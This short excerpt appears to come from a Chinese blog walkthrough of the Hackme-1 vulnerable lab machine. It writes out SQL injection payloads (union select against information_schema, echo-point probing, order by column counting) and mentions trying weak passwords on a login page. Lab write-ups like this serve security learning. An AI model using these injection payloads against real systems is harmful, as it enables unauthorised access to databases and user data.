Hackme-1 靶机渗透流程
输入OSINT' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # ,查看表名,发现users表。输入OSINT' union select 1,2,3 # ,查看回显点,得到回显点为1,2(可以直接将书名换成-1)输入OSINT' order by 4 # ,页面显示错误,判断为3列。开启后发现是登录界面,试了试弱口令不行,点击注册,
原创
2024-08-14 19:48:03 ·
230 阅读 ·
0 评论